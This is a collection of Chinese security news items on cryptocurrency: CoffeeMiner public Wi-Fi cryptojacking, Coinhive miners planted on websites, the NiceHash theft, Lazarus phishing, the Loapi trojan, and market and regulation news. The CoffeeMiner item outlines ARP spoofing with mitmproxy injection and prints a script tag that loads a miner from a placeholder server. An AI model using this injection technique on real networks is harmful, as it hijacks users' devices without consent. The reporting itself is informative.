据外媒 1 月 6 日报道，开发商 Arnau 发布了一个名为 CoffeeMiner 的概念证明项目，展示了攻击者如何利用公共 Wi-Fi 网络来挖掘加密货币。 加密货币的价格上涨使其一直受到网络攻击者的青睐。不久前，黑客就瞄准了星巴克里 “ 蹭网 ” 的笔记本，将其变成了自己的矿机疯狂挖掘门罗币（与比特币类似的一种加密货币）。 Arnau 专家受到了星巴克案件的启发，破解公共 Wi-Fi 网络，将加密挖掘代码注入到连接的浏览会话中，迫使连入 公共 Wi-Fi 网络的所有设备秘密挖掘加密货币。 Arnau 解释了如何在连接的用户访问的 html 页面中为 MITM (中间人)攻击注入一些 javascript ，这样做所有连接到 WiFi 网络的设备都可以强制成为 Arnau 的加密货币。 Arnau 专家分享 CoffeeMiner 攻击方式： 通过欺骗局域网上的地址解析协议（ARP）消息拦截网络上其他设备的未加密传输。 使用 Mitmproxy 将 JavaScript 注入到 Wi-Fi 用户访问的页面中。 为了保证过程简洁，开发人员只注入了一行调用加密货币矿工的代码。 <script src="http://httpserverIP:8000/script.js" type="text/javascript"></script> 然后，通过一个 HTTP 服务器服务该挖掘器。当用户的浏览器加载带有注入代码的页面时，运行 JavaScript 滥用 CPU 时间，并使用 CoinHive 加密挖掘软件挖掘 Monero 。 一旦编译完成，这些元素就会成为一个单独的脚本，可以由攻击者在公共 Wi-Fi 网络上部署。不知情的用户通过由攻击者控制的服务器重新路由，导致其设备在浏览时挖掘加密货币。 目前研究人员发布的 CoffeeMiner 版本尚不支持 HTTPS，但是可以通过添加 sslstrip 来绕过限制。 相关阅读： 研究人员发布的 CoffeeMiner 攻击演示视频  Arnau 在GitHub上发布的 CoffeeMiner 项目代码 消息来源：Security Affairs、Zdnet，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

外媒 1 月 9 日消息， 一位绰号为 “ Rundvleeskroket ” 的 Reddit 用户于 6 日声称黑莓手机官网（blackberrymobile.com）被攻击者利用，通过 Coinhive 货币挖矿工具挖掘 Monero（门罗币） 。根据 Coinhive 的说法该网站遭入侵是因为 Magento 电子商务软件存在安全漏洞。 调查显示，似乎只有全球网站受到 coinhive 挖矿工具的影响，其加拿大、欧盟、美国等地区的用户不在涉及范围内。 Reddit 用户分享的屏幕截图 目前黑莓手机官网已删除了 Coinhive 工具代码，但此类事件愈演愈烈情形不容乐观： 去年 11 月份，专家报告称相同的攻击者加载伪装成假 jQuery 和 Google Analytics JavaScript 文件的恶意脚本，这些文件实际上是 Coinhive 浏览器内加密货币矿工的副本。截至 11 月 22 日，据专家统计共有 1,833 个网站被攻击。 12 月份，Sucuri 的专家发现近 5,500 个 WordPress 网站感染恶意脚本。研究显示该恶意脚本能够记录击键信息，并在访问者的浏览器中加载了一个秘密工作的虚拟货币挖矿工具。同月，星巴克某店 Wifi 被爆遭黑客利用蹭网用户电脑进行挖矿。 Coinhive 工具官方在发现了同一个 Coinhive 帐户被许多其他网站所使用后，对该账户进行了封禁操作。此外，Coinhive 因其服务被滥用向用户表达了歉意。 消息来源：Security Affairs，编译：榆榆，校审：FOX; 本文由 HackerNews.cc 编译整理，封面来源于网络； 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

12 月上旬的时候，加密货币挖矿网站 NiceHash 曝出了黑客入侵事件，结果导致当时价值将近 6400 万美元的比特币失窃、以及网站关停 24 小时。该网站允许用户利用其闲置的 GPU 运算资源来挖掘加密货币，但本次攻击破坏了其支付系统、并清空了它的比特币钱包。虽然创始人次日就在 Facebook 上直播道歉，但这显然无法平息众人的愤怒。最新消息是，由于 Marko Kobal 愧对了大家的信任，所以 NiceHash 任命了一位新的 CEO。 Kobal 曾在领英上发表了一份声明，称该公司在努力恢复，同时透露公司可以在新管理层的领导下继续运营下去。 据斯洛文尼亚《劳动报》（Delo）报道，Zdravko Poljasevic 将接替公司首席执行官（CEO）的职务。 至于与 Kobal 共同创立 NiceHash 的 Matjaz Skorjanc ，则会继续担任首席技术官（CTO）的职务。 稿源：；稿件以及封面源自网络；

据媒体 1 月 1 日报道，瑞波币（ripple）交易价格在上周五暴涨近 56 % ，创历史新高，市值一举超越以太币，成为第二大加密货币。 根据数字资产信息平台 CoinMarketCap 的数据，瑞波币价格在上周五下午大涨 55.9 %，达到创纪录的 2.23 美元。 CoinMarketCap 的数据显示，瑞波币的市值因此达到 863 亿美元，超过了以太币 730 亿美元的市值。早些时候，随着加密货币价格在早间交易中出现波动，瑞波币和以太币为争夺第二名的宝座展开了激烈较量。 根据 CoinMarketCap 的数据，到目前为止，比特币仍然是第一大数字货币，当前市值约为 2470 亿美元，在加密货币总市值的占比约为 41 %，瑞波币的占比约为 12.5 %，而以太币的占比约为 12.1 %。 六大市值最高加密货币 CoinMarketCap 的数据显示，瑞波币的市值曾在今年 5 月份超越以太币，成为第二大加密货币，但随后瑞波币的价格出现暴跌，只剩下 36 美分左右。瑞波币的交易价格最终在上上周突破 1 美元，在上周五下午突破 2 美元，进入 2017 年以来价格已累计上涨逾 34,700 %。 CoinMarketCap 的数据显示，以太币的价格在上周五下午上涨约 2 % 至 753.57 美元，市值约为 728 亿美元。另一家虚拟货币信息平台 Coinbase 的数据显示，比特币的交易价格当天也出现小幅上涨，接近 14,475 美元。 稿源：；稿件以及封面源自网络；

安全公司 Proofpoint 近日发现 Lazarus APT 组织对加密货币极为关注， 并试图利用公众、媒体对加密货币价格暴涨的浓厚兴趣展开攻击。因此 Proofpoint 推断 Lazarus 的攻击行动可能与经济利益挂钩。 Lazarus（音译 “ 拉撒路 ”）堪称全球金融机构首要威胁。该组织自 2009 年以来一直处于活跃状态，据推测早在 2007 年就已涉足摧毁数据及破坏系统的网络间谍活动。调查显示，黑客组织 Lazarus 与 2014 年索尼影业遭黑客攻击事件及 2016 年孟加拉国银行数据泄露事件有关。（编者注） Proofpoint 发现 Lazarus 的攻击行动有一些共同特性： 第一、朝鲜黑客发起的几个多阶段的攻击都使用了与加密货币有关联的恶意软件来感染用户。 第二，包括 Gh0st RAT 在内的其他恶意软件，都旨在窃取加密货币钱包和交易的凭证，使 Lazarus 组织能够利用比特币和其他加密货币进行有利可图的操作。 因此 Proofpoint 推测 Lazarus 所进行的间谍活动极有可能是出于经济原因（这些行动或是朝鲜特有的），但此前已有多家安全公司认定 Lazarus APT是由国家资助的间谍组织，而国家支持的组织通常又会进行间谍活动和制造混乱。因此研究 Lazarus 的这些行动变得具有探索意义，有趣的地方在于： ○ Lazarus  APT 似乎是被公开的由国家资助以获取经济利益的第一个黑客组织组织 ○ 这些针对加密货币的攻击行动也有利于研究人员记录 Lazarus APT 所使用的定制工具和程序。 ○ 通过这些行动可以推断 Lazarus 并不是一个针对个体的单纯组织。 ○ 可以更好地了解 Lazarus 的行动和其所代表的全球威胁 消息来源： Security Affairs ，编译：榆榆，校审：FOX 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

韩国反垄断机构 “ 联邦贸易委员会 ” (以下简称 “ FTC ” )今日宣布，已对 13 家主要的数字加密货币交易所进行了调查，以评估它们是否违反了消费者保护法。这些被调查的交易所包括 Bithumb、Coinone 和 Korbit 等，FTC 将考虑是继续将这些交易所归类为 “ 在线零售业务 ” ，还是归类为其他不同的业务，以强化监管。 此外，FTC 还将评估这些交易所制定的各种条款是否存在不公平性。 此次调查为期三天，基于调查结果，韩国 FTC 将采取相应的措施来监管这些交易所。本月早些时候，韩国政府召开多部门联合紧急会议，决定采取多项措施遏制虚拟货币市场投机和犯罪活动。 会议决定，将禁止未成年人开设账户和交易虚拟货币，禁止金融机构持有、购买虚拟货币或以虚拟货币投资；在进行与虚拟货币投资相关的银行转账业务时，要求本人确认等。 此外，韩国政府还计划推进立法，保护投资者并增强虚拟货币交易透明度；探讨设立虚拟货币交易所的相关安全监管措施；明确界定与代币融资 ( ICO ) 相关的违禁行为，并严惩违禁行为。另外，韩国政府还将设立工作组，讨论是否对虚拟货币交易收益征税。 在此之前，韩国数字加密货币交易所 Youbit 刚刚发布公告称，由于今年已第二次遭黑客入侵，丢失了数字钱包，公司将申请破产，所有现金和数字货币的结算将按照所有破产程序进行。 之前，Youbit 就被归类为 “ 在线零售业务 ” 。而业内观察表示，经过此次调查，FTC 将来可能把这些交易所归类为 “ 金融机构 ”，在安全和消费者保护方面将面临更严格的监管。 稿源：cnBeta、，稿件以及封面源自网络；编辑：榆榆

卡巴斯基实验室本周一（ 12 月 18 日）发布博文表示，发现一种名为 Loapi 的功能强大的木马病毒，其具备多重攻击手段、能够利用被感染设备挖掘加密货币、发起 DDos 攻击等，甚至于对存在该木马病毒智能手机也会造成物理损坏——使感染病毒时间超过两天的手机电池膨胀。   伪装成杀毒软件和色情应用程序感染设备 研究人员介绍，恶意开发人员利用 Loapi  挖掘加密货币、用固定广告骚扰用户、启动拒绝服务 ( DoS ) 网络攻击、访问文本消息并连接到网络。当用户被重定向到攻击者的恶意网络资源后，会自动下载恶意文件。据悉，存在  Loapi  的恶意软件可以伪装成至少 20 种不同的杀毒软件和色情应用程序去感染用户设备。 在用户安装假冒的应用程序的过程中，应用程序会尝试获取设备管理员权限， 通过循环弹框直到用户同意授权为止。随后，Loapi 将其图标隐藏在菜单中或模拟各种防病毒活动，试图让用户相信该应用程序是合法的。而具体的行为特征则取决于它所伪装成的应用程序类型，如下图： 具备强大的自我保护机制 研究发现，木马病毒 Loapi 能够积极地对抗任何想要撤销设备管理权限的企图，每当用户试图取消这些权限时，恶意应用程序将会锁定屏幕并使用设备管理器设置关闭窗口，并执行以下代码： 同时该木马还能够从其 C＆C 服务器接收一个危险的应用程序列表用于监听某些应用程序的安装和启动， 例如当木马 Loapi 检测到一个真正的反病毒应用程序，它会谎称其是恶意软件，并循环弹框迫使用户卸载该反病毒应用程序。 开采 Monero （门罗币） 导致手机电池膨胀 根据卡巴斯基实验室的说法，木马 Loapi 具备挖掘加密货币的功能，能够利用被感染设备的计算资源挖掘数字货币 Monero（门罗币），也正是这种功能甚至导致了设备电池膨胀，以至于对手机造成物理损害。 据研究人员介绍，Loapi 似乎是 2015 年发现的一个 “ Podec ” 木马的新版本，堪称恶意 Android 应用程序界中的一朵  “ 奇葩 ”。  感染木马病毒后的手机设备，两天后出现电池膨胀现象 Loapi 的开发者几乎用上了我们能够想到的所有手段对攻击设备进行攻击：该木马可以使用户订阅付费服务、任意发送短信、产生流量并通过展示广告赚钱、利用设备的计算能力来挖掘加密货币、并在互联网上进行各种活动。目前唯一缺少的行为就是 “ 间谍活动 ”，但是此类木马专业且模块化的体系结构意味着它随时都能添加这种功能。 所幸，目前 Loapi 被发现只潜伏于第三方应用商店 ，尚未出现在 Google App Store 中。但即使是在官方商店下载应用程序，用户也需时刻保持警惕，因为恶意软件随时可能会出现各种木马漏洞。 消息来源： IBTimes、securelist，编译：榆榆，校审：FOX 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

最近一年，我们已经屡次听闻与 “令牌销售”（token sale）和 “首次代币发行”（ICO）相关的报道，这也从侧面反映了加密数字货币的受追捧程度。尽管期间不时有交易所被黑客攻击或跑路的负面事件发生，矿工们对它的热情依然没有太多的消减。自 2014 年以来，加密货币初创企业 Elementus 成功募集到至少 10 万美元的令牌销售事件。此外基于月度数据，图表也可以展示这些 ICO 的整体现金流向。 由图表可知，该行业前三年的发展相对缓慢，但在 2017 年 5 月份迎来了爆发。在此期间，差不多有几十个 ICO 项目在并行启动，从狂热者和投资者手中轻松拿到了数百万美元的资金。 在比特币和以太坊的带动下，基于区块链技术的加密货币市场迎来了爆发式增长。Elementus 创始人兼 UPenn 兼职讲师 Max Galka 写到：我们对可找到的每一个令牌（token）、众销（crowdsale）和多重签名钱包（multisig wallet）进行了搜索，然后识别出相应的所有者、对他们贡献的资金总额进行了计算。数据要么来自区块链本身，要么就来自筹款人发布的报告。 稿源：cnBeta，封面源自网络；编辑：青楚

据外媒 12 月 15 日报道，美国网络安全公司 Secureworks 周五表示，朝鲜 Lazarus APT 集团正对伦敦一家加密货币公司展开钓鱼式攻击行动，其目的在于窃取比特币行业内部人士的在线证书。Secureworks 公司警告钓鱼活动可能带来严重后果。 Lazarus（音译 “ 拉撒路 ”）堪称全球金融机构首要威胁。该组织自 2009 年以来一直处于活跃状态，据推测早在 2007 年就已涉足摧毁数据及破坏系统的网络间谍活动。调查显示，黑客组织 Lazarus 与 2014 年索尼影业遭黑客攻击事件及 2016 年孟加拉国银行数据泄露事件有关。（编者注） 以招聘为饵散播钓鱼邮件 据 Secureworks 的专家介绍， Lazarus APT 以伦敦一家加密货币公司担任首席财务官职位为饵制作了针对性的钓鱼邮件，一步步引诱受害者点击邮件中附带的恶意链接。点击链接后的用户系统将会感染恶意代码、安装远控软件并进一步下载其他恶意软件或被窃取数据。 Secureworks 公司表示，这个恶意软件与 Lazarus APT 集团之前的一个叫做 “ Nickel Academy ” 的行动共享技术链接。在这次攻击中观察到的 TTPs（techniques, tactics, and procedures）与此前属于 Lazarus APT 的网络攻击战术有许多相似之处。不过目前为止 Secureworks 并没有透露是否有用户点击了钓鱼链接的任何消息 。 钓鱼活动仍在继续进行 据路透社报道，这次发现的鱼叉式网络钓鱼 (Spear phishing) 攻击似乎开始于今年 10 月 25 日，但据研究人员观察，最初的钓鱼活动应该可以追溯到 2016 年。研究人员认为直至目前 Lazarus APT 窃取证书的钓鱼活动仍在进行中。 最近侵入韩国几家比特币交易所的行为被暂时归咎于朝鲜 ，因为通过 Secureworks 搜集的证据显示，朝鲜于 2013 年就显露出对比特币的强烈兴趣。当时，有国家资助背景的黑客使用了一组来自使用朝鲜互联网地址的计算机用户名，这些用户名就是被用来研究比特币的。因此研究人员猜测，这次侵入韩国比特币交易所使用的同一个互联网地址与之前的朝鲜行动有关。 “鉴于目前比特币价格的暴涨，美国反恐局（ CTU ）怀疑朝鲜对加密货币的兴趣仍然很高，并且可能继续围绕加密货币开展攻击行动”， Secureworks 公司在给路透社的一份声明中表示 Lazarus APT 的钓鱼活动仍在进行中，并警告可能造成严重后果。 消息来源： Security Affairs ，编译：榆榆，校审：FOX 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

据外媒报道，黑客入侵网站植入挖矿脚本后利用用户的 CPU 挖掘数字货币的做法越来越流行。其相关数据统计，目前已有 2,496 家运行过时软件的网站遭到黑客植入恶意代码，并利用访问者 CPU 挖掘门罗币。 研究人员表示，其中 80% 的网站还被植入了其它恶意程序，允许黑客窃取访问者的银行卡信息。据称，这些网站植入的都是 Coinhive.com 提供的脚本，其中 85% 被入侵网站植入的脚本属于两个 Coinhive 账号、15% 的则属于其他 Coinhive 账号。值得注意的是，这些账号正被一个人或一个组织控制。 此外，根据资源管理器显示，CPU 占用率超过了 95％，而关闭这个网站后立即降到 9％。因此，如果用户打开内嵌挖矿代码的网站后不关闭，每台电脑每个月都会多消耗2.9-5美元的电费，这还不算对硬件寿命的额外损耗。目前，研究人员提醒用户可以通过广告屏蔽工具或专门扩展阻止挖矿脚本的运行。 稿源：根据 cnBeta、solidot奇客 综合整理，封面源自网络；